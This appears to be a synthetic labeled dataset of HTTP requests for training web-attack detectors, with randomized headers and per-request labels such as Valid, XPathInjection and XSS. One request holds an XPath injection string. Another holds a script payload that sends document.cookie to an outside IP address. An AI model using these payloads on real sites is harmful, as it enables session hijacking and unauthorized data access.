Via: 0.8 www.4lhAim.tiff, HTTP/8.0 www.aotgt.shtml, HTTP/4.2 www.moei.js
Transfer-Encoding: rYIn6e; anQLe=jgtermi
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35322
Start - Id: 29570
class: Valid
GET /wuP/rI4@lW/yAUA8JlN@WUuDta/l3Ra85puevanNyLbDCn.pl?GS_38drop1Q1_=row6fo%40gX&8lhdasqxta8i=unrmi%7EesyoyRcrm+%7E5w&hIurjzrtnM=52149731&dneblo4aterhy=087&deleteVV@Lzx-0autoexecb=aJe2n&8sas0o=20314489&Nrn2aTZa1=1796 HTTP/1.0
Host: www.c1isoo.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-9, x-mac-chinesetrad;q=0.1, euc-tw, euc-jp;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: aMlg='70'
Client-ip: 187.64.65.72
Cookie: uaTaitsqtzq=3srm;uhdnoeEiro4ua=niilley;ileixALa0e=10049
Cookie2: $Version="7"
Date: Mon, 09 Mar 09 21:59:33 UTC
ETag: "CNsoJzy-6bRfbsyxA1"
Expect: 100-continue
From: ei0RuvN@uwelbdt.org
If-Modified-Since: Wed, 03 Nov 04 07:38:42 UTC
If-Unmodified-Since: Tue, 27 Jun 06 13:38:19 UTC
If-Match: "tRd6MXsxLNvXc-EuBz"
If-None-Match: *
If-Range: Sun, 09 Jan 05 02:35:29 GMT
Max-Forwards: 351
MIME-Version: 2.0
Pragma: nu=b6e
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: NTLM U2djOWdlZUxlMG9Bc3RpYmxuMTV0cnJuaXRoYWxyZzBqQXN0ckxiZWhhYW5zYTI=
Range: 825369-97,558284-7,646196-4450
Referer: /dVSAeeHm/nhwomae/hnceoo73/gefagv.jsp
TE: trailers,trailers,gzip
Trailer: Trailer
User-Agent: ek78lse
UA-CPU: 68000
UA-Disp: 5272,2339,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: 2.9 www.3l65ut.png
Transfer-Encoding: compress
Upgrade: gih7ot/7.0, vjwg/9.7, tttnua/4.6
Warning: 880 250.169.70.244:31 "ob2rr7pb4tes" "Sun, 10 May 09 07:32:46 UTC"
X-Forwarded-For: 223.17.177.5
X-Serial-Number: 97266154050
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29570
Start - Id: 29061
class: Valid
GET /sD86r/gnei/u0NueyB/momo7et4Beyti1h78a/arnshfoees/admin1RUUHj7HP5Q5v/i8LLt_ovFm/c5Rememanb3ge9.php3?jasjkx=sLsbXuwa HTTP/1.0
Host: www.Shmpn.biz:80
Connection: 4Egze8ho
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: drtA-u8i8ps5m, E-waemfr, 7eUs-DehEe, TlSgY-lt14hiz4, 4drPdwos-7Eg
Cache-Control: only-if-cached
Client-ip: 22.98.82.39
Cookie: asliesnb=r3dgpNs;8e6ytddaseih7oe=ap
Cookie2: $Version="4"
Date: Thu, 29 Apr 04 22:12:22 GMT
ETag: "znuW.eAT.4Wbvxp"
Expect: ae8u
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Thu, 23 Jul 09 05:45:01 UTC
If-Match: "5gWE8lbldsmAAYnLH2"
If-None-Match: "KSMh_2osIHIPdXQ69_J0"
If-Range: Wed, 26 Aug 09 23:08:28 UTC
Max-Forwards: 3
MIME-Version: 4.9
Pragma: et='ktoesnse'
Proxy-Authorization: gssa mdooRR=usOT
Authorization: p9y3 lrtgma=nohm
Range: 2-728395,2-644,-332
Referer: /iqOL/s1qyto/autn8i8.gif
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: tVje8.6sP http://www.cta3.com
UA-CPU: x86
UA-Disp: 6073,149,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 890x9958
Via: HTTP/9.5 www.nowe.gif:5, HTTP/9.3 174.99.98.67, 0.4 www.hIatc.jpg
Transfer-Encoding: compress
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 278 www.tcotssn.tiff "t1rotxxS" "Thu, 11 Nov 04 16:16:21 UTC"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29061
Start - Id: 2870
class: Valid
GET /hW6EJ/JdzwyGSdaiusE6hbtjea/nmtspnecetsieherp/pY/warn9atenth/rs9-rGNtmA_caPolpZ/R4ZtJDpcatPL/l2etpAoTst7ioeuir/maiernoOxCdee/g5hiX.d42Q4XZW_JG9/enfC95hrmxnozaomnae.asmx?nntgr5=ueh7h&6zaiaaioao=ea%7Cree+ukoate&por1NorpcpxnIk=nRAQbWj.Z&SomlieDEsn=567&between14krdM41cC=84458652 HTTP/1.1
Host: www.nou3eaz.it
Connection: naAnq6o
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.3, gzip, deflate;q=0.2
Accept-Language: o-urxeyPd, I3-Oe2;q=0.5, m-5Uy2nao;q=0.4, 4vknlzh-aid;q=0.2, liittUo-vacaiolo
Cache-Control: no-cache
Client-ip: 93.198.149.6
Cookie: avet5Acsa=e h\i
Cookie2: $Version="098"
Date: Sat, 18 Nov 06 05:07:33 CET
ETag: W/"75mKU4khjzIg6n5ch3"
Expect: 100-continue
From: amatu@3ain.cz
If-Modified-Since: Tue, 03 Oct 06 13:35:36 CET
If-Unmodified-Since: Fri, 28 Mar 08 08:20:28 UTC
If-Match: "VWIbgAtR9pHWbOQb"
If-None-Match: *
If-Range: Fri, 25 Nov 05 12:35:03 GMT
Max-Forwards: 2
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="1elicrrc"
Authorization: Digest cnonce="tntr6s"
Range: 02742-7
Referer: /aAce/qoonsec.sh
TE: trailers,trailers
Trailer: Date
User-Agent: optptetnfrgNenf
UA-CPU: 68000
UA-Disp: 7777,5626,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 640x6169
Via: HTTP/0.7 202.73.104.225
Transfer-Encoding: gzip
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 935 www.toai.html "yahrbo" "Thu, 01 Mar 07 01:43:53 UTC"
X-Forwarded-For: 61.7.104.185
X-Serial-Number: 62195
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2870
Start - Id: 48543
class: XPathInjection
PUT /6soxe/e4vpdaf4ngNee/tgfPd6BO9a59KWwt08.jpg? HTTP/1.0
Content-Length: 498
Content-Language: lsAswx,ihaRT9t
Content-Encoding: compress
Content-Location: /AOu8igt/dl02e/meNmlhmx/9enhsd.ace
Content-MD5: dGVJbDF0ZXRuaWhJbjl1Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Nov 06 18:09:05 GMT
Last-Modified: Sun, 11 Mar 07 19:53:16 GMT
Host: www.u9nnthtohs.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1250, isiri-3342;q=0.0, iso-8859-9, cp-936;q=0.7
Accept-Encoding: gzip;q=0.9, deflate;q=0.1, gzip
Accept-Language: n45dee2m-faElea;q=0.9, nq-SaGNe;q=0.3, evBt-Rt
Cache-Control: max-stale
Client-ip: 220.175.249.82
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="4"
Date: Mon, 29 Aug 05 04:51:14 CET
ETag: W/"VEWmiSXDjK-PzOVZj6"
Expect: ynrsc=akpl
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 05 Dec 08 10:19:32 GMT
If-Unmodified-Since: Mon, 09 Feb 04 24:32:05 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 May 05 09:28:06 GMT
Max-Forwards: 5
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: rOl0ta 9ssa=Epiteonc
Authorization: NTLM NG5hYWU2bFR0ZTFsSnJsZWVmM0xoajR3c2VlbjFOMnM1ZnNvU1U=
Range: -3
Referer: http://www.sunua.it/usirigge/eubih.tiff
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 1.3; ha-ep; rv:4.1.8) Gecko/59525248
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 429x1759
Via: FTP/1.9 www.tGilfPw.jpeg, 4.2 www.rnse.js
Transfer-Encoding: identity
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

foquh=496896&4opdoit5nlrN6t=5i76demeutD&se0eeih2wya=wacedatorno&ML32inputh7_opth6=ioliorEhneegee&EO=zReeon1tr&4gybgaenijuwar=fI-bZfAVFKV&xzqnts3=57   or     count(path/child::node()[position()=((i+j+k+l+1)]   |   path/child::*()[position()=(k+1)])=1   or     330=&osd=teprocessing-instruction;h&JyUlikeRP1rZgT-=hne1ecta&eerf=ISaeDtmcIid&6o&3sfgCrtw=pne\passwdrrnrdenrh|&du19tjielt0=lVWHI&e2=Cpanae&HV0HWk=2245829&nrio=ro

End - Id: 48543
Start - Id: 15523
class: Valid
GET /rDKox.feGW@w-F2EFFl/ntblsaey9mcc7gilaesf/efB/a6weao/tne0fwznHanJSase/apw/eixvaesq7s0t/7Al16koZPQsofm-4nUj/pL06wCA.e4/oM2R2C/miHiU_U/Vh7b-.pl?pi1LiRwn0e=nEMq&aess=su&w1NsreplaceyVtelnetYNformK=xdocumentseowsp+Opisi&Aha6ottrtMe=g90nbl7mwhere+gpdgyb%2B%3B HTTP/1.0
Host: 180.138.0.204
Connection: keep-alive
Accept: video/*;q=0.7, application/rtf;q=0.5
Accept-Charset: x-mac-japanese, euc-tw;q=0.2, x-mac-hebrew, x-mac-hebrew, windows-1251
Accept-Encoding: *;q=0.0
Accept-Language: iascN-tasd, SnayieIo-ntds;q=0.0, h-EhtNt, hehipl-nd6s3;q=0.3, oalTids-wmthknft
Cache-Control: max-stale=18489
Client-ip: 210.248.209.57
Cookie: 2..Jhn=esam0dstdinfe0+slgaGss0ma;pa65=challl1oD$\Anode
Cookie2: $Version="524"
Date: Sun, 01 Feb 04 01:36:16 CET
ETag: W/"HfjNRiPZAw7WYjax@q"
Expect: svCnr
From: seean@8ua2seurko.de
If-Modified-Since: Wed, 25 Jul 07 10:22:43 GMT
If-Unmodified-Since: Fri, 17 Dec 04 17:57:12 CET
If-Match: "jh8MZHTWurJap1GPKi"
If-None-Match: "e@FUS8QgxXnRGCd2T"
If-Range: *
Max-Forwards: 962
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM aXNlYWx0eWRvbThoYTVkZWFvVXRtaXNhd2RVZWRtbTBs
Authorization: knitk nsiixrl=eaSsrca
Range: 253580-
Referer: /1nrnnu/U9uea5he/eey1e/1aqoe/iloles8q.tiff
TE: trailers,deflate,gzip;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.6; Win98; itdfs; tvfc4ecs)
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3257x239
Via: 1.7 33.210.59.61
Transfer-Encoding: compress
Upgrade: thhe/1.0, eaei/8.0, nsecs/0.9, aadn/9.2, 7na/8.4
Warning: 748 145.153.150.169 "3xejD" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 46412923699025736
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15523
Start - Id: 34296
class: Valid
PUT /iwb/iucaaen/iR6YMU8aSZgWzO.V-YG/6yDgSK_r.FPcGK/nIr0t/bnull7pq@4nodesystemxterm7Qz.y/PImT/x53rs.htm? HTTP/1.0
Content-Length: 110
Content-Language: aiitn7,t2iaie,e
Content-Encoding: identity
Content-Location: /sndeai/aismtlwo/riuls.aspx
Content-MD5: c3FlcjRoaHdvbGVkczNwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Dec 09 02:18:34 CET
Last-Modified: Fri, 12 Jun 09 16:39:13 UTC
Host: 169.150.90.55
Connection: tIitase
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: Nwrhi-noe;q=0.7, neea-e;q=0.6, ase-seh, edinei-A, ctti-Ipce;q=0.2
Cache-Control: max-stale=431
Client-ip: 194.196.68.198
Cookie: rd=id2itnetcattio
Cookie2: $Version="3"
Date: Fri, 20 Mar 09 08:49:43 GMT
ETag: W/"MIfK1cMgAyFIcMw4j"
Expect: 100-continue
From: hysea@neCr9r.com
If-Modified-Since: Sun, 07 Nov 04 20:33:58 CET
If-Unmodified-Since: Sun, 03 Jul 05 17:47:55 UTC
If-Match: "mdkn-G35pBkkqZSbfdaL"
If-None-Match: *
If-Range: *
Max-Forwards: 699
MIME-Version: 7.7
Pragma: ei=eelo4
Proxy-Authorization: dooif easg=eyxlos
Authorization: eUoago kktgktms=8l8ehl
Range: -18,2241-
Referer: /qEy7.gz
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/0.3 (compatible; MSIE 8.4; WinNT; tsrad; arP68; qsreut)
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1417x508
Via: HTTP/4.7 142.49.75.239, 1.1 46.194.230.103
Transfer-Encoding: ba39dT; QPne=6nrnrt
Upgrade: posIin/2.5, mri/9.3, Tfa/9.0, sadis/4.2, bfeetp/2.9
Warning: 720 www.adln4.tiff:115 "T5aUbnb" "Sun, 26 Oct 08 21:05:18 GMT"
X-Forwarded-For: 23.54.143.100
X-Serial-Number: 437295181628210
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eo=73&o8m=ooaahir&Qgcmdvbscriptprocessing-instructionwget=to6v&cmdBUnid-X8autoexecP=dpZx1Bc&etth0anpioB2=71233

End - Id: 34296
Start - Id: 47535
class: XSS
GET /c3stGnceutei1p/l9ByiE4_hsRQKj/rw/xixsuz.gif?iuDehprtiap=%3E&siasrotrEt60lr=0536138&antuoasciFe=%3BwgetOs&EhBh=%26%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F85.202.121.157%2Fin.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&nsaopweu=it&c0p1Phoonlmevdc=eaNY&thoh3sja=edhee8swgett HTTP/1.1
Host: 209.103.161.173:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 37.55.220.136
Cookie: 69QiKtp=e;C2s6e=o-
Cookie2: $Version="0"
Date: Fri, 05 Dec 08 05:29:46 GMT
ETag: "G60koYB8vEN@YsEWc3"
Expect: pnInt
From: rxai5au@cfrdhneel.st
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Wed, 25 Feb 04 14:53:05 UTC
If-Match: "JB@tTM7-v87QCR89Sz_"
If-None-Match: *
If-Range: "UL_xPTr96AZwl97pC"
Max-Forwards: 8875
MIME-Version: 0.8
Pragma: rdUhbb7t='0il'
Proxy-Authorization: Digest uri=http://www.nihe.biz/7s36/4eafim5e/iflioc.php3
Authorization: Irtno s0ohameh=vleani
Range: 924-,916951-
Referer: /staA4iN/Whopnh/flt2.sh
TE: gzip
Trailer: TE
User-Agent: eeOytlza/3.7.7
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: a7ut; derLnT=bsferx
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 758 232.178.55.106 "aerbantiefsyete" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47535
Start - Id: 11046
class: Valid
GET /mreaenso/hteh5Dexe2qg/AQgx72l3f-L/ert3Ae/d0QjmE/eihsvhsst8wlci.bin?lknn0mc2ealn=9ytwjWLv&ehntw=%7Cs&ha730a2Tw=u2 HTTP/1.1
Host: www.ot3t.it
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.4, x-mac-korean;q=0.2, windows-1254, euc-kr
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 229.4.31.216
Cookie: ahhfeuhe5ntpda=tl3Cja88;rcarro=cndO_k2F;Uepqiuanf=bt(i;t9sOeth=40471916;ejdaoe=)t&~d
Cookie2: $Version="171"
Date: Sun, 05 Aug 07 02:11:40 CET
ETag: W/"UecBknSQLiX3Rorgsu"
Expect: 100-continue
From: c08i@ekhfsb.st
If-Modified-Since: Thu, 11 Dec 08 13:14:44 UTC
If-Unmodified-Since: Mon, 17 May 04 17:09:06 CET
If-Match: "Ef0UOykS.qMU-xk9Gg"
If-None-Match: "MSMSS7Ogq4YZ3aeD"
If-Range: *
Max-Forwards: 3278
MIME-Version: 8.5
Pragma: ieHi='ertts'
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: NTLM c0kxbnhOdWVoQWpkU29kbjZhVGVnc0l6dDgwd29kaXllZHNvc0F1ZTVhb3JvcmVs
Range: 22-392,-6553,-595
Referer: /eelreb/nOnsavyt.ace
TE: gzip;q=0.0
Trailer: Connection
User-Agent: at8rs (ePp_os2AR; 1.jvt@Z; se-9p3g; gORW3eO)
UA-CPU: x86
UA-Disp: 8400,268,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: FTP/1.9 79.70.171.163, neq/5.0 181.36.207.116
Transfer-Encoding: gzip
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 660 97.116.247.67 "al7pinn" "Wed, 19 Dec 07 14:44:12 CET"
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 86044035
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11046
Start - Id: 3828
class: Valid
GET /8ts2/og6URdlu8@4NNvTV/xRJQoK4TGhHctSOOo-i/rp6toihsrhpnalst2a/hd0E/ycopy49home1-T/4xktnl4a7eEla.jpeg?nT4uraafe=4byPvO&derzoR=ffelEiTEvEs&p7oeogbonarrhn=m1+nndiv HTTP/1.1
Host: 21.127.206.71
Connection: wmmsDo
Accept: */*;q=0.3
Accept-Charset: cp-936;q=0.8, euc-jp;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: tsUm-ia, v9-ad2Mh;q=0.6, e4j7w-y;q=0.4
Cache-Control: no-cache
Client-ip: 18.45.164.199
Cookie: pohrhhMtwb=ehastAr;1i6Eudg5cdTdci=like 
Cookie2: $Version="3"
Date: Fri, 30 Dec 05 01:04:39 CET
ETag: W/"i62Ar9.5ze4YKwdAnAx"
Expect: hhac2b
From: t2t8sa@hrgeicir.com
If-Modified-Since: Fri, 23 Jul 04 13:03:48 UTC
If-Unmodified-Since: Thu, 05 Jun 08 11:20:43 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Dec 08 18:39:28 CET
Max-Forwards: 053
MIME-Version: 9.7
Pragma: 1oo='fimcndj'
Proxy-Authorization: Basic d3JsbW46d2RzM2FoNXI=
Authorization: Digest nonce
Range: 81-,7-,210582-422
Referer: http://www.rns0ue.com/oxrt3ie/slutA/79o4cx/6e1o/nm9eitr.php
TE: gzip;q=0.6,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.6 (compatible; Konqueror/4.8; Win 9x; oUaMasWtae; seror4)
UA-CPU: 68000
UA-Disp: 203,803,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5647x8744
Via: 9.4 54.24.11.24
Transfer-Encoding: deflate
Upgrade: tr4e/1.4, ntsu/9.3, heCo/5.1, aaa/5.7, te9o/9.8
Warning: 803 119.71.170.20 "xs6gpt8bmty1" 
X-Forwarded-For: 152.209.120.49
X-Serial-Number: 0041726921666628262
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3828
Start - Id: 22621
class: Valid
GET /eis-aF5ExFdcE/_xml3J/iFwY@w21.css?rtmdehrowfc=uUPj-4nBEZ&adrgf=7%27med&ctasooanEiasL=117563345&eOefob8dii2o=h5u+noctiatupdate%3Cnetcatd&4dymeta8r=a7%40wxTwjc7o&@img0pDQwz6=42&EurniEsyfo=So&8nlWbinGa81K=%40document%25&LU4QQUy=54134&h_0bFQ6KoB1=935&gQUpK=69900&eG-r2nl=s0egjpmOrcels3p HTTP/1.0
Host: 184.197.6.239:80
Connection: eetnpt
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.9
Accept-Encoding: 
Accept-Language: ndoe-t, iseulo-H;q=0.3
Cache-Control: no-store
Client-ip: 158.13.254.69
Cookie: 1l3z=htpassrrhalllposition;fmnltpae=jc9&ek3n;hit5ttido;sG4uttaEescqgn=04;spli=n.4ZFt0b4Q3H;nQ-2PbIhKwff=aanoeraqeHitaie
Cookie2: $Version="84"
Date: Thu, 13 Jan 05 05:03:34 UTC
ETag: W/"cUnGLaaSXEnKtn8o"
Expect: 100-continue
From: cigho@ceitnchx.be
If-Modified-Since: Sat, 07 Jul 07 13:42:18 UTC
If-Unmodified-Since: Tue, 12 Oct 04 01:04:19 GMT
If-Match: "5MOlpEkHPXY1xrcCj"
If-None-Match: "jia22OSPoaQ._qg3I"
If-Range: Sat, 18 Dec 04 19:47:13 CET
Max-Forwards: 0686
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM dHNlN2Vzb2h0dGxWemtlZmVoYWVucm5jMnlzbXdhd3d3ZjBldA==
Authorization: Basic U2xuZjplcGc5Z205
Range: -43745
Referer: http://O8iewas.it/nNgec25m/aspq3tsh/l97rs.mdb
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: ocb3lufm7 (lSM.m5L)
UA-CPU: Sparc
UA-Disp: 0852,741,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 353x5479
Via: ron5s/8.5 202.81.2.184, 1.0 www.rpru.jpeg
Transfer-Encoding: identity
Upgrade: atr/6.0, rel8/5.7, Taa6/8.7, mkeoa4/7.0, osqs/2.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22621
Start - Id: 14460
class: Valid
GET /82ans4Meo/dwiHingg3bSmtfaute8o/IpLLVK./lGC66PoU0NjJ146a-Dyx/hpiuao/e3htui0edmrpn/.Y/mailF/sty.htm?ppat7vhLee=M&Ipqip=240203746&RdYribhdtZi=%27&NeYipTuh=aBHUQl12mKww&sttdyudia3E=2701075846&onmere=7ninqhoonWasrhijle&dwkofe=elT%3Elan1tih&cys4teeso=0aasusreeY&BaWkqD.I4=e+%3C&OY3JWxm5_Uor=sOFOIbBU6 HTTP/1.0
Host: www.Yhxp.cz
Connection: ymohqerr
Accept: video/*;q=0.9, application/zip;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: compress, identity, identity;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 34.163.123.98
Cookie: hs80fqthbrrnua=g6s;rain=7fV;Na5veeogntgaatn=eJNd9z;eltcisxslncbeea=8129533661;xaT=elihhAejcoo;caoFobnOao1l2=a;eval ifs
Cookie2: $Version="0"
Date: Sat, 19 Feb 05 10:45:57 GMT
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Fri, 06 Jan 06 20:36:27 CET
If-Unmodified-Since: Mon, 10 Dec 07 05:34:21 GMT
If-Match: "o532Mggw@.9NNDkDA"
If-None-Match: "WGwqc_aM99lCm9sOI6"
If-Range: Wed, 16 Jul 08 22:54:02 GMT
Max-Forwards: 3
MIME-Version: 2.3
Pragma: gnnet='yro'
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: Basic eWx0cXM6bG5pYQ==
Range: 063-,416644-557318
Referer: http://www.nehidrO.gov/eegp9/enhnIfet.png
TE: gzip;q=0.9,deflate;q=0.7
Trailer: From
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 3.4; e5-na; rv:9.6.9) Gecko/59693557
UA-CPU: 68000
UA-Disp: 6368,730,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5927x518
Via: 9.5 237.249.34.58:13, 0.0 www.tby3m.shtml
Transfer-Encoding: compress
Upgrade: trkh/8.6, taslsi/0.6, se2/8.7, etaY/5.5, dpsae/7.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 309851
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14460
Start - Id: 22819
class: Valid
GET /_JeIQFCUHwB-i4Q/bionkideebCluoa/d19n@erkLy.45MUJ6X@/scHEO7/at8sGt/cTY1c/XvbscriptdS.IQ6/EcopyHSnform3dl8/nto.9YeppSAnC9eKB55u/i3UqcKIJcNNsq@D9nK.js? HTTP/1.1
Host: 172.184.63.2:9
Connection: close
Accept: text/xml;q=0.6, application/*, text/plain;q=0.0
Accept-Charset: windows-1250;q=0.2, utf-8, windows-1254, iso-8859-9;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=614
Client-ip: 173.3.239.168
Cookie: 06eTDe=la3EnnE;iI=eeTwiebegavm;hrebi=lgoieNmdt;rtnk=d;htacceszBdocumentkCA8B=491203
Cookie2: $Version="458"
Date: Thu, 17 Nov 05 21:41:09 CET
ETag: W/"oSLg.vCUJVD7fTrQ"
Expect: 100-continue
From: asgr0Hal@rouR.fr
If-Modified-Since: Tue, 06 Jan 04 15:28:27 UTC
If-Unmodified-Since: Mon, 13 Nov 06 05:37:36 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 02 May 05 19:49:38 UTC
Max-Forwards: 00
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: NTLM ZXN0cjJFZWlkY3NTZDA0ZWNpQmFzbGg3b2FwN21ocXpyY290YWh4cm51ZTdo
Range: -637
Referer: http://www.aiht.de/o3to/xhTai/lt2uhho.pl
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/7.6 (X11; U; Linux i386 8.0; Dt-4e; rv:7.7.7) Gecko/56601507
UA-CPU: 68000
UA-Disp: 7936,637,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 7.0 www.ieem1hhe.shtml
Transfer-Encoding: gzip
Upgrade: gt7o/0.8
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 8712140
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22819
Start - Id: 16323
class: Valid
GET /C0D5LL_whereoZ/s@xuC/sprWS.2JI.Uh/ow/QO/w1egMSvn8e4e.cfm?sin=oYYvY&iiIkiiarhndR=7107&wlfkknntf=8&Eesh=emRN&LTU.-_W4SD@h=0&tnctYhm6rbyIrOk=s4tn&fcidqlAheee=noemeUtsefcsriinF&sgt8etoehor=331636&6iu=8&wn8bdw5=passwdb&npsew=sg8q4ks6&it8arapE02nhvdT=49&cut=493840656&a2oodmrnnruwIBt=2023 HTTP/1.1
Host: www.nsubettan7.cz
Connection: btyds
Accept: image/jpeg;q=0.9, video/quicktime, video/*
Accept-Charset: hz-gb-2312;q=0.1
Accept-Encoding: 
Accept-Language: ai8snnuc-neqw5nl;q=0.8, te8royhY-b79ooR;q=0.0, i8e-edhIe;q=0.5, itnlum-tue4soo;q=0.0
Cache-Control: max-stale=85
Client-ip: 76.128.152.96
Cookie: vtY2=5695;enteycorljiote=dgeTt<;dAttos= mecho'oe;j
Cookie2: $Version="725"
Date: Mon, 16 Jun 08 09:20:10 UTC
ETag: "OIq2z55.cn@ja3WSe625"
Expect: mii8=7pi0yr;blo1=Utnsh
From: fewlhd@mrbErs.biz
If-Modified-Since: Fri, 17 Jun 05 23:22:19 GMT
If-Unmodified-Since: Sat, 04 Dec 04 16:57:05 UTC
If-Match: *
If-None-Match: "HuHUX-WhLlABN898p"
If-Range: "c@o4EuJExI7aVKdFI"
Max-Forwards: 9384
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="82A7c3FC33BF6ce472e42Ce6b7Ca8D7B"
Authorization: ecnwhw jhtocOtb=nanja
Range: -652120,9-,091-
Referer: http://eharesr.de/s9amph/obughoTf/yTbf/sg8tu/nt0r.exe
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: oteAiooheeet
